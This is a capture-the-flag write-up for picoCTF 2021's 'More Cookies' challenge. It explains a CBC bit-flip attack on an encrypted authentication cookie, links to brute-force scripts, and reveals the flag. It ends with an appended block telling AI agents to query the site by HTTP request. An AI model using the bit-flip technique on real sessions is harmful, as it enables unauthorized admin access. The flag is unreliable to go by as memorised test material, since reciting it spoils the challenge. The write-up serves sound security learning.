# More Cookies
## Problem
> I forgot Cookies can Be modified Client-side, so now I decided to encrypt them!
## Solution
1. This is a continuation of the "Cookies" challenge, which I did not write up since it is very simple. However, this challenge is fairly difficult despite the point value.
2. There is a cookie called `auth_name` with the value `eEozQmFzQUNUL2Y1c1hIWmZTOEl4OS9wcUwyRkMyVVE4MUdseEZRYnZWU1E3WXRoOHU5cjkwOXpGM3hwTVc4SGx5K1BNbGdBaFhUOFpXWWpCMTl6dE1QNlNzUGJOVTRpeGdSSnA5dDI2ODBXRXVBMkhpWUtWVVBTNmh6RnJGNXE=`. Decoding this as base64 using [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64\('A-Za-z0-9%2B/%3D',true\)\&input=ZUVvelFtRnpRVU5VTDJZMWMxaElXbVpUT0VsNE9TOXdjVXd5UmtNeVZWRTRNVWRzZUVaUlluWldVMUUzV1hSb09IVTVjamt3T1hwR00zaHdUVmM0U0d4NUsxQk5iR2RCYUZoVU9GcFhXV3BDTVRsNmRFMVFObE56VUdKT1ZUUnBlR2RTU25BNWRESTJPREJYUlhWQk1raHBXVXRXVlZCVE5taDZSbkpHTlhFPQ) produces gibberish since it is encrypted as per the challenge description.
3. The letters `C`, `B`, and `C` are capitalized in the challenge description which is a hint that [cipher block chaining (CBC)](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher_block_chaining_\(CBC\)) is used. CBC is vulnerable to a bit flip. This [answer on the Crypto StackExchange](https://crypto.stackexchange.com/a/66086) extensively explains this attack. Essentially, there is a single bit that determines if the user is an admin. Maybe there is a parameter like `admin=0` and if we change the correct bit then we can set `admin=1`. However, the position of this bit is unknown, so we can try every position until we get the flag.
4. Outdated (see 5 for improved method): ~~We write a Python~~ [~~script~~](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/More%20Cookies/script.py) ~~to complete this bruteforce attack. I originally only tried the first 10 positions, which was enough to get the flag so I left the max number of positions to try at 10.~~
5. We write an [improved Python script.py](https://github.com/HHousen/PicoCTF-2021/blob/master/Web%20Exploitation/More%20Cookies/improved_script.py) to complete this bruteforce attack. The script loops through all the bits in the cookie and flips each one until the flag is shown. See the comments in the script for more details.
### Flag
`picoCTF{cO0ki3s_yum_a9a19fa6}`
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://picoctf2021.haydenhousen.com/web-exploitation/more-cookies.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.